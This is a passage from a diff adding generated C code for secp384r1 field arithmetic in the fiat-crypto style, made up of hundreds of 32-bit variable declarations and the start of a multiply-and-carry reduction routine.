x160; ++ fiat_secp384r1_uint1 x161; ++ uint32_t x162; ++ fiat_secp384r1_uint1 x163; ++ uint32_t x164; ++ fiat_secp384r1_uint1 x165; ++ uint32_t x166; ++ fiat_secp384r1_uint1 x167; ++ uint32_t x168; ++ fiat_secp384r1_uint1 x169; ++ uint32_t x170; ++ fiat_secp384r1_uint1 x171; ++ uint32_t x172; ++ fiat_secp384r1_uint1 x173; ++ uint32_t x174; ++ fiat_secp384r1_uint1 x175; ++ uint32_t x176; ++ fiat_secp384r1_uint1 x177; ++ uint32_t x178; ++ fiat_secp384r1_uint1 x179; ++ uint32_t x180; ++ fiat_secp384r1_uint1 x181; ++ uint32_t x182; ++ fiat_secp384r1_uint1 x183; ++ uint32_t x184; ++ fiat_secp384r1_uint1 x185; ++ uint32_t x186; ++ fiat_secp384r1_uint1 x187; ++ uint32_t x188; ++ fiat_secp384r1_uint1 x189; ++ uint32_t x190; ++ fiat_secp384r1_uint1 x191; ++ uint32_t x192; ++ fiat_secp384r1_uint1 x193; ++ uint32_t x194; ++ fiat_secp384r1_uint1 x195; ++ uint32_t x196; ++ fiat_secp384r1_uint1 x197; ++ uint32_t x198; ++ fiat_secp384r1_uint1 x199; ++ uint32_t x200; ++ fiat_secp384r1_uint1 x201; ++ uint32_t x202; ++ fiat_secp384r1_uint1 x203; ++ uint32_t x204; ++ fiat_secp384r1_uint1 x205; ++ uint32_t x206; ++ fiat_secp384r1_uint1 x207; ++ uint32_t x208; ++ fiat_secp384r1_uint1 x209; ++ uint32_t x210; ++ fiat_secp384r1_uint1 x211; ++ uint32_t x212; ++ fiat_secp384r1_uint1 x213; ++ uint32_t x214; ++ uint32_t x215; ++ uint32_t x216; ++ uint32_t x217; ++ uint32_t x218; ++ uint32_t x219; ++ uint32_t x220; ++ uint32_t x221; ++ uint32_t x222; ++ uint32_t x223; ++ uint32_t x224; ++ uint32_t x225; ++ uint32_t x226; ++ uint32_t x227; ++ uint32_t x228; ++ uint32_t x229; ++ uint32_t x230; ++ uint32_t x231; ++ uint32_t x232; ++ uint32_t x233; ++ uint32_t x234; ++ fiat_secp384r1_uint1 x235; ++ uint32_t x236; ++ fiat_secp384r1_uint1 x237; ++ uint32_t x238; ++ fiat_secp384r1_uint1 x239; ++ uint32_t x240; ++ fiat_secp384r1_uint1 x241; ++ uint32_t x242; ++ fiat_secp384r1_uint1 x243; ++ uint32_t x244; ++ fiat_secp384r1_uint1 x245; ++ uint32_t x246; ++ fiat_secp384r1_uint1 x247; ++ uint32_t x248; ++ fiat_secp384r1_uint1 x249; ++ uint32_t x250; ++ fiat_secp384r1_uint1 x251; ++ uint32_t x252; ++ fiat_secp384r1_uint1 x253; ++ uint32_t x254; ++ fiat_secp384r1_uint1 x255; ++ uint32_t x256; ++ fiat_secp384r1_uint1 x257; ++ uint32_t x258; ++ fiat_secp384r1_uint1 x259; ++ uint32_t x260; ++ fiat_secp384r1_uint1 x261; ++ uint32_t x262; ++ fiat_secp384r1_uint1 x263; ++ uint32_t x264; ++ fiat_secp384r1_uint1 x265; ++ uint32_t x266; ++ fiat_secp384r1_uint1 x267; ++ uint32_t x268; ++ fiat_secp384r1_uint1 x269; ++ uint32_t x270; ++ fiat_secp384r1_uint1 x271; ++ uint32_t x272; ++ fiat_secp384r1_uint1 x273; ++ uint32_t x274; ++ fiat_secp384r1_uint1 x275; ++ uint32_t x276; ++ fiat_secp384r1_uint1 x277; ++ uint32_t x278; ++ fiat_secp384r1_uint1 x279; ++ uint32_t x280; ++ fiat_secp384r1_uint1 x281; ++ uint32_t x282; ++ fiat_secp384r1_uint1 x283; ++ uint32_t x284; ++ fiat_secp384r1_uint1 x285; ++ uint32_t x286; ++ fiat_secp384r1_uint1 x287; ++ uint32_t x288; ++ fiat_secp384r1_uint1 x289; ++ uint32_t x290; ++ fiat_secp384r1_uint1 x291; ++ uint32_t x292; ++ fiat_secp384r1_uint1 x293; ++ uint32_t x294; ++ fiat_secp384r1_uint1 x295; ++ uint32_t x296; ++ fiat_secp384r1_uint1 x297; ++ uint32_t x298; ++ fiat_secp384r1_uint1 x299; ++ uint32_t x300; ++ uint32_t x301; ++ uint32_t x302; ++ uint32_t x303; ++ uint32_t x304; ++ uint32_t x305; ++ uint32_t x306; ++ uint32_t x307; ++ uint32_t x308; ++ uint32_t x309; ++ uint32_t x310; ++ uint32_t x311; ++ uint32_t x312; ++ uint32_t x313; ++ uint32_t x314; ++ uint32_t x315; ++ uint32_t x316; ++ uint32_t x317; ++ uint32_t x318; ++ uint32_t x319; ++ uint32_t x320; ++ fiat_secp384r1_uint1 x321; ++ uint32_t x322; ++ fiat_secp384r1_uint1 x323; ++ uint32_t x324; ++ fiat_secp384r1_uint1 x325; ++ uint32_t x326; ++ fiat_secp384r1_uint1 x327; ++ uint32_t x328; ++ fiat_secp384r1_uint1 x329; ++ uint32_t x330; ++ fiat_secp384r1_uint1 x331; ++ uint32_t x332; ++ fiat_secp384r1_uint1 x333; ++ uint32_t x334; ++ fiat_secp384r1_uint1 x335; ++ uint32_t x336; ++ fiat_secp384r1_uint1 x337; ++ uint32_t x338; ++ fiat_secp384r1_uint1 x339; ++ uint32_t x340; ++ fiat_secp384r1_uint1 x341; ++ uint32_t x342; ++ fiat_secp384r1_uint1 x343; ++ uint32_t x344; ++ fiat_secp384r1_uint1 x345; ++ uint32_t x346; ++ fiat_secp384r1_uint1 x347; ++ uint32_t x348; ++ fiat_secp384r1_uint1 x349; ++ uint32_t x350; ++ fiat_secp384r1_uint1 x351; ++ uint32_t x352; ++ fiat_secp384r1_uint1 x353; ++ uint32_t x354; ++ fiat_secp384r1_uint1 x355; ++ uint32_t x356; ++ fiat_secp384r1_uint1 x357; ++ uint32_t x358; ++ fiat_secp384r1_uint1 x359; ++ uint32_t x360; ++ fiat_secp384r1_uint1 x361; ++ uint32_t x362; ++ fiat_secp384r1_uint1 x363; ++ uint32_t x364; ++ fiat_secp384r1_uint1 x365; ++ uint32_t x366; ++ fiat_secp384r1_uint1 x367; ++ uint32_t x368; ++ fiat_secp384r1_uint1 x369; ++ uint32_t x370; ++ fiat_secp384r1_uint1 x371; ++ uint32_t x372; ++ fiat_secp384r1_uint1 x373; ++ uint32_t x374; ++ fiat_secp384r1_uint1 x375; ++ uint32_t x376; ++ fiat_secp384r1_uint1 x377; ++ uint32_t x378; ++ fiat_secp384r1_uint1 x379; ++ uint32_t x380; ++ fiat_secp384r1_uint1 x381; ++ uint32_t x382; ++ fiat_secp384r1_uint1 x383; ++ uint32_t x384; ++ fiat_secp384r1_uint1 x385; ++ uint32_t x386; ++ uint32_t x387; ++ uint32_t x388; ++ uint32_t x389; ++ uint32_t x390; ++ uint32_t x391; ++ uint32_t x392; ++ uint32_t x393; ++ uint32_t x394; ++ uint32_t x395; ++ uint32_t x396; ++ uint32_t x397; ++ uint32_t x398; ++ uint32_t x399; ++ uint32_t x400; ++ uint32_t x401; ++ uint32_t x402; ++ uint32_t x403; ++ uint32_t x404; ++ uint32_t x405; ++ uint32_t x406; ++ fiat_secp384r1_uint1 x407; ++ uint32_t x408; ++ fiat_secp384r1_uint1 x409; ++ uint32_t x410; ++ fiat_secp384r1_uint1 x411; ++ uint32_t x412; ++ fiat_secp384r1_uint1 x413; ++ uint32_t x414; ++ fiat_secp384r1_uint1 x415; ++ uint32_t x416; ++ fiat_secp384r1_uint1 x417; ++ uint32_t x418; ++ fiat_secp384r1_uint1 x419; ++ uint32_t x420; ++ fiat_secp384r1_uint1 x421; ++ uint32_t x422; ++ fiat_secp384r1_uint1 x423; ++ uint32_t x424; ++ fiat_secp384r1_uint1 x425; ++ uint32_t x426; ++ fiat_secp384r1_uint1 x427; ++ uint32_t x428; ++ fiat_secp384r1_uint1 x429; ++ uint32_t x430; ++ fiat_secp384r1_uint1 x431; ++ uint32_t x432; ++ fiat_secp384r1_uint1 x433; ++ uint32_t x434; ++ fiat_secp384r1_uint1 x435; ++ uint32_t x436; ++ fiat_secp384r1_uint1 x437; ++ uint32_t x438; ++ fiat_secp384r1_uint1 x439; ++ uint32_t x440; ++ fiat_secp384r1_uint1 x441; ++ uint32_t x442; ++ fiat_secp384r1_uint1 x443; ++ uint32_t x444; ++ fiat_secp384r1_uint1 x445; ++ uint32_t x446; ++ fiat_secp384r1_uint1 x447; ++ uint32_t x448; ++ fiat_secp384r1_uint1 x449; ++ uint32_t x450; ++ fiat_secp384r1_uint1 x451; ++ uint32_t x452; ++ fiat_secp384r1_uint1 x453; ++ uint32_t x454; ++ fiat_secp384r1_uint1 x455; ++ uint32_t x456; ++ fiat_secp384r1_uint1 x457; ++ uint32_t x458; ++ fiat_secp384r1_uint1 x459; ++ uint32_t x460; ++ fiat_secp384r1_uint1 x461; ++ uint32_t x462; ++ fiat_secp384r1_uint1 x463; ++ uint32_t x464; ++ fiat_secp384r1_uint1 x465; ++ uint32_t x466; ++ fiat_secp384r1_uint1 x467; ++ uint32_t x468; ++ fiat_secp384r1_uint1 x469; ++ uint32_t x470; ++ fiat_secp384r1_uint1 x471; ++ uint32_t x472; ++ uint32_t x473; ++ uint32_t x474; ++ uint32_t x475; ++ uint32_t x476; ++ uint32_t x477; ++ uint32_t x478; ++ uint32_t x479; ++ uint32_t x480; ++ uint32_t x481; ++ uint32_t x482; ++ uint32_t x483; ++ uint32_t x484; ++ uint32_t x485; ++ uint32_t x486; ++ uint32_t x487; ++ uint32_t x488; ++ uint32_t x489; ++ uint32_t x490; ++ uint32_t x491; ++ uint32_t x492; ++ fiat_secp384r1_uint1 x493; ++ uint32_t x494; ++ fiat_secp384r1_uint1 x495; ++ uint32_t x496; ++ fiat_secp384r1_uint1 x497; ++ uint32_t x498; ++ fiat_secp384r1_uint1 x499; ++ uint32_t x500; ++ fiat_secp384r1_uint1 x501; ++ uint32_t x502; ++ fiat_secp384r1_uint1 x503; ++ uint32_t x504; ++ fiat_secp384r1_uint1 x505; ++ uint32_t x506; ++ fiat_secp384r1_uint1 x507; ++ uint32_t x508; ++ fiat_secp384r1_uint1 x509; ++ uint32_t x510; ++ fiat_secp384r1_uint1 x511; ++ uint32_t x512; ++ fiat_secp384r1_uint1 x513; ++ uint32_t x514; ++ fiat_secp384r1_uint1 x515; ++ uint32_t x516; ++ fiat_secp384r1_uint1 x517; ++ uint32_t x518; ++ fiat_secp384r1_uint1 x519; ++ uint32_t x520; ++ fiat_secp384r1_uint1 x521; ++ uint32_t x522; ++ fiat_secp384r1_uint1 x523; ++ uint32_t x524; ++ fiat_secp384r1_uint1 x525; ++ uint32_t x526; ++ fiat_secp384r1_uint1 x527; ++ uint32_t x528; ++ fiat_secp384r1_uint1 x529; ++ uint32_t x530; ++ fiat_secp384r1_uint1 x531; ++ uint32_t x532; ++ fiat_secp384r1_uint1 x533; ++ uint32_t x534; ++ fiat_secp384r1_uint1 x535; ++ uint32_t x536; ++ fiat_secp384r1_uint1 x537; ++ uint32_t x538; ++ fiat_secp384r1_uint1 x539; ++ uint32_t x540; ++ fiat_secp384r1_uint1 x541; ++ uint32_t x542; ++ fiat_secp384r1_uint1 x543; ++ uint32_t x544; ++ fiat_secp384r1_uint1 x545; ++ uint32_t x546; ++ fiat_secp384r1_uint1 x547; ++ uint32_t x548; ++ fiat_secp384r1_uint1 x549; ++ uint32_t x550; ++ fiat_secp384r1_uint1 x551; ++ uint32_t x552; ++ fiat_secp384r1_uint1 x553; ++ uint32_t x554; ++ fiat_secp384r1_uint1 x555; ++ uint32_t x556; ++ fiat_secp384r1_uint1 x557; ++ uint32_t x558; ++ uint32_t x559; ++ uint32_t x560; ++ uint32_t x561; ++ uint32_t x562; ++ uint32_t x563; ++ uint32_t x564; ++ uint32_t x565; ++ uint32_t x566; ++ uint32_t x567; ++ uint32_t x568; ++ uint32_t x569; ++ uint32_t x570; ++ uint32_t x571; ++ uint32_t x572; ++ uint32_t x573; ++ uint32_t x574; ++ uint32_t x575; ++ uint32_t x576; ++ uint32_t x577; ++ uint32_t x578; ++ fiat_secp384r1_uint1 x579; ++ uint32_t x580; ++ fiat_secp384r1_uint1 x581; ++ uint32_t x582; ++ fiat_secp384r1_uint1 x583; ++ uint32_t x584; ++ fiat_secp384r1_uint1 x585; ++ uint32_t x586; ++ fiat_secp384r1_uint1 x587; ++ uint32_t x588; ++ fiat_secp384r1_uint1 x589; ++ uint32_t x590; ++ fiat_secp384r1_uint1 x591; ++ uint32_t x592; ++ fiat_secp384r1_uint1 x593; ++ uint32_t x594; ++ fiat_secp384r1_uint1 x595; ++ uint32_t x596; ++ fiat_secp384r1_uint1 x597; ++ uint32_t x598; ++ fiat_secp384r1_uint1 x599; ++ uint32_t x600; ++ fiat_secp384r1_uint1 x601; ++ uint32_t x602; ++ fiat_secp384r1_uint1 x603; ++ uint32_t x604; ++ fiat_secp384r1_uint1 x605; ++ uint32_t x606; ++ fiat_secp384r1_uint1 x607; ++ uint32_t x608; ++ fiat_secp384r1_uint1 x609; ++ uint32_t x610; ++ fiat_secp384r1_uint1 x611; ++ uint32_t x612; ++ fiat_secp384r1_uint1 x613; ++ uint32_t x614; ++ fiat_secp384r1_uint1 x615; ++ uint32_t x616; ++ fiat_secp384r1_uint1 x617; ++ uint32_t x618; ++ fiat_secp384r1_uint1 x619; ++ uint32_t x620; ++ fiat_secp384r1_uint1 x621; ++ uint32_t x622; ++ fiat_secp384r1_uint1 x623; ++ uint32_t x624; ++ fiat_secp384r1_uint1 x625; ++ uint32_t x626; ++ fiat_secp384r1_uint1 x627; ++ uint32_t x628; ++ fiat_secp384r1_uint1 x629; ++ uint32_t x630; ++ fiat_secp384r1_uint1 x631; ++ uint32_t x632; ++ fiat_secp384r1_uint1 x633; ++ uint32_t x634; ++ fiat_secp384r1_uint1 x635; ++ uint32_t x636; ++ fiat_secp384r1_uint1 x637; ++ uint32_t x638; ++ fiat_secp384r1_uint1 x639; ++ uint32_t x640; ++ fiat_secp384r1_uint1 x641; ++ uint32_t x642; ++ fiat_secp384r1_uint1 x643; ++ uint32_t x644; ++ uint32_t x645; ++ uint32_t x646; ++ uint32_t x647; ++ uint32_t x648; ++ uint32_t x649; ++ uint32_t x650; ++ uint32_t x651; ++ uint32_t x652; ++ uint32_t x653; ++ uint32_t x654; ++ uint32_t x655; ++ uint32_t x656; ++ uint32_t x657; ++ uint32_t x658; ++ uint32_t x659; ++ uint32_t x660; ++ uint32_t x661; ++ uint32_t x662; ++ uint32_t x663; ++ uint32_t x664; ++ fiat_secp384r1_uint1 x665; ++ uint32_t x666; ++ fiat_secp384r1_uint1 x667; ++ uint32_t x668; ++ fiat_secp384r1_uint1 x669; ++ uint32_t x670; ++ fiat_secp384r1_uint1 x671; ++ uint32_t x672; ++ fiat_secp384r1_uint1 x673; ++ uint32_t x674; ++ fiat_secp384r1_uint1 x675; ++ uint32_t x676; ++ fiat_secp384r1_uint1 x677; ++ uint32_t x678; ++ fiat_secp384r1_uint1 x679; ++ uint32_t x680; ++ fiat_secp384r1_uint1 x681; ++ uint32_t x682; ++ fiat_secp384r1_uint1 x683; ++ uint32_t x684; ++ fiat_secp384r1_uint1 x685; ++ uint32_t x686; ++ fiat_secp384r1_uint1 x687; ++ uint32_t x688; ++ fiat_secp384r1_uint1 x689; ++ uint32_t x690; ++ fiat_secp384r1_uint1 x691; ++ uint32_t x692; ++ fiat_secp384r1_uint1 x693; ++ uint32_t x694; ++ fiat_secp384r1_uint1 x695; ++ uint32_t x696; ++ fiat_secp384r1_uint1 x697; ++ uint32_t x698; ++ fiat_secp384r1_uint1 x699; ++ uint32_t x700; ++ fiat_secp384r1_uint1 x701; ++ uint32_t x702; ++ fiat_secp384r1_uint1 x703; ++ uint32_t x704; ++ fiat_secp384r1_uint1 x705; ++ uint32_t x706; ++ fiat_secp384r1_uint1 x707; ++ uint32_t x708; ++ fiat_secp384r1_uint1 x709; ++ uint32_t x710; ++ fiat_secp384r1_uint1 x711; ++ uint32_t x712; ++ fiat_secp384r1_uint1 x713; ++ uint32_t x714; ++ fiat_secp384r1_uint1 x715; ++ uint32_t x716; ++ fiat_secp384r1_uint1 x717; ++ uint32_t x718; ++ fiat_secp384r1_uint1 x719; ++ uint32_t x720; ++ fiat_secp384r1_uint1 x721; ++ uint32_t x722; ++ fiat_secp384r1_uint1 x723; ++ uint32_t x724; ++ fiat_secp384r1_uint1 x725; ++ uint32_t x726; ++ fiat_secp384r1_uint1 x727; ++ uint32_t x728; ++ fiat_secp384r1_uint1 x729; ++ uint32_t x730; ++ uint32_t x731; ++ uint32_t x732; ++ uint32_t x733; ++ uint32_t x734; ++ uint32_t x735; ++ uint32_t x736; ++ uint32_t x737; ++ uint32_t x738; ++ uint32_t x739; ++ uint32_t x740; ++ uint32_t x741; ++ uint32_t x742; ++ uint32_t x743; ++ uint32_t x744; ++ uint32_t x745; ++ uint32_t x746; ++ uint32_t x747; ++ uint32_t x748; ++ uint32_t x749; ++ uint32_t x750; ++ fiat_secp384r1_uint1 x751; ++ uint32_t x752; ++ fiat_secp384r1_uint1 x753; ++ uint32_t x754; ++ fiat_secp384r1_uint1 x755; ++ uint32_t x756; ++ fiat_secp384r1_uint1 x757; ++ uint32_t x758; ++ fiat_secp384r1_uint1 x759; ++ uint32_t x760; ++ fiat_secp384r1_uint1 x761; ++ uint32_t x762; ++ fiat_secp384r1_uint1 x763; ++ uint32_t x764; ++ fiat_secp384r1_uint1 x765; ++ uint32_t x766; ++ fiat_secp384r1_uint1 x767; ++ uint32_t x768; ++ fiat_secp384r1_uint1 x769; ++ uint32_t x770; ++ fiat_secp384r1_uint1 x771; ++ uint32_t x772; ++ fiat_secp384r1_uint1 x773; ++ uint32_t x774; ++ fiat_secp384r1_uint1 x775; ++ uint32_t x776; ++ fiat_secp384r1_uint1 x777; ++ uint32_t x778; ++ fiat_secp384r1_uint1 x779; ++ uint32_t x780; ++ fiat_secp384r1_uint1 x781; ++ uint32_t x782; ++ fiat_secp384r1_uint1 x783; ++ uint32_t x784; ++ fiat_secp384r1_uint1 x785; ++ uint32_t x786; ++ fiat_secp384r1_uint1 x787; ++ uint32_t x788; ++ fiat_secp384r1_uint1 x789; ++ uint32_t x790; ++ fiat_secp384r1_uint1 x791; ++ uint32_t x792; ++ fiat_secp384r1_uint1 x793; ++ uint32_t x794; ++ fiat_secp384r1_uint1 x795; ++ uint32_t x796; ++ fiat_secp384r1_uint1 x797; ++ uint32_t x798; ++ fiat_secp384r1_uint1 x799; ++ uint32_t x800; ++ fiat_secp384r1_uint1 x801; ++ uint32_t x802; ++ fiat_secp384r1_uint1 x803; ++ uint32_t x804; ++ fiat_secp384r1_uint1 x805; ++ uint32_t x806; ++ fiat_secp384r1_uint1 x807; ++ uint32_t x808; ++ fiat_secp384r1_uint1 x809; ++ uint32_t x810; ++ fiat_secp384r1_uint1 x811; ++ uint32_t x812; ++ fiat_secp384r1_uint1 x813; ++ uint32_t x814; ++ fiat_secp384r1_uint1 x815; ++ uint32_t x816; ++ uint32_t x817; ++ uint32_t x818; ++ uint32_t x819; ++ uint32_t x820; ++ uint32_t x821; ++ uint32_t x822; ++ uint32_t x823; ++ uint32_t x824; ++ uint32_t x825; ++ uint32_t x826; ++ uint32_t x827; ++ uint32_t x828; ++ uint32_t x829; ++ uint32_t x830; ++ uint32_t x831; ++ uint32_t x832; ++ uint32_t x833; ++ uint32_t x834; ++ uint32_t x835; ++ uint32_t x836; ++ fiat_secp384r1_uint1 x837; ++ uint32_t x838; ++ fiat_secp384r1_uint1 x839; ++ uint32_t x840; ++ fiat_secp384r1_uint1 x841; ++ uint32_t x842; ++ fiat_secp384r1_uint1 x843; ++ uint32_t x844; ++ fiat_secp384r1_uint1 x845; ++ uint32_t x846; ++ fiat_secp384r1_uint1 x847; ++ uint32_t x848; ++ fiat_secp384r1_uint1 x849; ++ uint32_t x850; ++ fiat_secp384r1_uint1 x851; ++ uint32_t x852; ++ fiat_secp384r1_uint1 x853; ++ uint32_t x854; ++ fiat_secp384r1_uint1 x855; ++ uint32_t x856; ++ fiat_secp384r1_uint1 x857; ++ uint32_t x858; ++ fiat_secp384r1_uint1 x859; ++ uint32_t x860; ++ fiat_secp384r1_uint1 x861; ++ uint32_t x862; ++ fiat_secp384r1_uint1 x863; ++ uint32_t x864; ++ fiat_secp384r1_uint1 x865; ++ uint32_t x866; ++ fiat_secp384r1_uint1 x867; ++ uint32_t x868; ++ fiat_secp384r1_uint1 x869; ++ uint32_t x870; ++ fiat_secp384r1_uint1 x871; ++ uint32_t x872; ++ fiat_secp384r1_uint1 x873; ++ uint32_t x874; ++ fiat_secp384r1_uint1 x875; ++ uint32_t x876; ++ fiat_secp384r1_uint1 x877; ++ uint32_t x878; ++ fiat_secp384r1_uint1 x879; ++ uint32_t x880; ++ fiat_secp384r1_uint1 x881; ++ uint32_t x882; ++ fiat_secp384r1_uint1 x883; ++ uint32_t x884; ++ fiat_secp384r1_uint1 x885; ++ uint32_t x886; ++ fiat_secp384r1_uint1 x887; ++ uint32_t x888; ++ fiat_secp384r1_uint1 x889; ++ uint32_t x890; ++ fiat_secp384r1_uint1 x891; ++ uint32_t x892; ++ fiat_secp384r1_uint1 x893; ++ uint32_t x894; ++ fiat_secp384r1_uint1 x895; ++ uint32_t x896; ++ fiat_secp384r1_uint1 x897; ++ uint32_t x898; ++ fiat_secp384r1_uint1 x899; ++ uint32_t x900; ++ fiat_secp384r1_uint1 x901; ++ uint32_t x902; ++ uint32_t x903; ++ uint32_t x904; ++ uint32_t x905; ++ uint32_t x906; ++ uint32_t x907; ++ uint32_t x908; ++ uint32_t x909; ++ uint32_t x910; ++ uint32_t x911; ++ uint32_t x912; ++ uint32_t x913; ++ uint32_t x914; ++ uint32_t x915; ++ uint32_t x916; ++ uint32_t x917; ++ uint32_t x918; ++ uint32_t x919; ++ uint32_t x920; ++ uint32_t x921; ++ uint32_t x922; ++ fiat_secp384r1_uint1 x923; ++ uint32_t x924; ++ fiat_secp384r1_uint1 x925; ++ uint32_t x926; ++ fiat_secp384r1_uint1 x927; ++ uint32_t x928; ++ fiat_secp384r1_uint1 x929; ++ uint32_t x930; ++ fiat_secp384r1_uint1 x931; ++ uint32_t x932; ++ fiat_secp384r1_uint1 x933; ++ uint32_t x934; ++ fiat_secp384r1_uint1 x935; ++ uint32_t x936; ++ fiat_secp384r1_uint1 x937; ++ uint32_t x938; ++ fiat_secp384r1_uint1 x939; ++ uint32_t x940; ++ fiat_secp384r1_uint1 x941; ++ uint32_t x942; ++ fiat_secp384r1_uint1 x943; ++ uint32_t x944; ++ fiat_secp384r1_uint1 x945; ++ uint32_t x946; ++ fiat_secp384r1_uint1 x947; ++ uint32_t x948; ++ fiat_secp384r1_uint1 x949; ++ uint32_t x950; ++ fiat_secp384r1_uint1 x951; ++ uint32_t x952; ++ fiat_secp384r1_uint1 x953; ++ uint32_t x954; ++ fiat_secp384r1_uint1 x955; ++ uint32_t x956; ++ fiat_secp384r1_uint1 x957; ++ uint32_t x958; ++ fiat_secp384r1_uint1 x959; ++ uint32_t x960; ++ fiat_secp384r1_uint1 x961; ++ uint32_t x962; ++ fiat_secp384r1_uint1 x963; ++ uint32_t x964; ++ fiat_secp384r1_uint1 x965; ++ uint32_t x966; ++ fiat_secp384r1_uint1 x967; ++ uint32_t x968; ++ fiat_secp384r1_uint1 x969; ++ uint32_t x970; ++ fiat_secp384r1_uint1 x971; ++ uint32_t x972; ++ fiat_secp384r1_uint1 x973; ++ uint32_t x974; ++ fiat_secp384r1_uint1 x975; ++ uint32_t x976; ++ fiat_secp384r1_uint1 x977; ++ uint32_t x978; ++ fiat_secp384r1_uint1 x979; ++ uint32_t x980; ++ fiat_secp384r1_uint1 x981; ++ uint32_t x982; ++ fiat_secp384r1_uint1 x983; ++ uint32_t x984; ++ fiat_secp384r1_uint1 x985; ++ uint32_t x986; ++ fiat_secp384r1_uint1 x987; ++ uint32_t x988; ++ fiat_secp384r1_uint1 x989; ++ uint32_t x990; ++ uint32_t x991; ++ uint32_t x992; ++ uint32_t x993; ++ uint32_t x994; ++ uint32_t x995; ++ uint32_t x996; ++ uint32_t x997; ++ uint32_t x998; ++ uint32_t x999; ++ uint32_t x1000; ++ uint32_t x1001; ++ x1 = (arg1[0]); ++ fiat_secp384r1_mulx_u32(&x2, &x3, x1, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x4, &x5, x1, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x6, &x7, x1, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x8, &x9, x1, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x10, &x11, x1, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x12, &x13, x1, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x14, &x15, x1, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x16, &x17, x1, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x18, &x19, x1, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x20, &x21, x1, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u32(&x22, &x23, 0x0, x19, x16); ++ fiat_secp384r1_addcarryx_u32(&x24, &x25, x23, x17, x14); ++ fiat_secp384r1_addcarryx_u32(&x26, &x27, x25, x15, x12); ++ fiat_secp384r1_addcarryx_u32(&x28, &x29, x27, x13, x10); ++ fiat_secp384r1_addcarryx_u32(&x30, &x31, x29, x11, x8); ++ fiat_secp384r1_addcarryx_u32(&x32, &x33, x31, x9, x6); ++ fiat_secp384r1_addcarryx_u32(&x34, &x35, x33, x7, x4); ++ fiat_secp384r1_addcarryx_u32(&x36, &x37, x35, x5, x2); ++ fiat_secp384r1_addcarryx_u32(&x38, &x39, 0x0, x1, x20); ++ fiat_secp384r1_addcarryx_u32(&x40, &x41, 0x0, (x39 + x21), (arg1[1])); ++ fiat_secp384r1_mulx_u32(&x42, &x43, x40, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x44, &x45, x40, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x46, &x47, x40, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x48, &x49, x40, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x50, &x51, x40, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x52, &x53, x40, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x54, &x55, x40, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x56, &x57, x40, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x58, &x59, x40, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x60, &x61, x40, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u32(&x62, &x63, 0x0, x59, x56); ++ fiat_secp384r1_addcarryx_u32(&x64, &x65, x63, x57, x54); ++ fiat_secp384r1_addcarryx_u32(&x66, &x67, x65, x55, x52); ++ fiat_secp384r1_addcarryx_u32(&x68, &x69, x67, x53, x50); ++ fiat_secp384r1_addcarryx_u32(&x70, &x71, x69, x51, x48); ++ fiat_secp384r1_addcarryx_u32(&x72, &x73, x71, x49, x46); ++ fiat_secp384r1_addcarryx_u32(&x74, &x75, x73, x47, x44); ++ fiat_secp384r1_addcarryx_u32(&x76, &x77, x75, x45, x42); ++ fiat_secp384r1_addcarryx_u32(&x78, &x79, 0x0, x40, x60); ++ fiat_secp384r1_addcarryx_u32(&x80, &x81, x79, x41, x61); ++ fiat_secp384r1_addcarryx_u32(&x82, &x83, x81, x18, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x84, &x85, x83, x22, x58); ++ fiat_secp384r1_addcarryx_u32(&x86, &x87, x85, x24, x62); ++ fiat_secp384r1_addcarryx_u32(&x88, &x89, x87, x26, x64); ++ fiat_secp384r1_addcarryx_u32(&x90, &x91, x89, x28, x66); ++ fiat_secp384r1_addcarryx_u32(&x92, &x93, x91, x30, x68); ++ fiat_secp384r1_addcarryx_u32(&x94, &x95, x93, x32, x70); ++ fiat_secp384r1_addcarryx_u32(&x96, &x97, x95, x34, x72); ++ fiat_secp384r1_addcarryx_u32(&x98, &x99, x97, x36, x74); ++ fiat_secp384r1_addcarryx_u32(&x100, &x101, x99, (x37 + x3), x76); ++ fiat_secp384r1_addcarryx_u32(&x102, &x103, x101, 0x0, (x77 + x43)); ++ fiat_secp384r1_addcarryx_u32(&x104, &x105, 0x0, x80, (arg1[2])); ++ fiat_secp384r1_addcarryx_u32(&x106, &x107, x105, x82, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x108, &x109, x107, x84, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x110, &x111, x109, x86, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x112, &x113, x111, x88, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x114, &x115, x113, x90, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x116, &x117, x115, x92, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x118, &x119, x117, x94, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x120, &x121, x119, x96, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x122, &x123, x121, x98, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x124, &x125, x123, x100, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x126, &x127, x125, x102, 0x0); ++ fiat_secp384r1_mulx_u32(&x128, &x129, x104, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x130, &x131, x104, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x132, &x133, x104, UINT32_C(0xffffffff)); 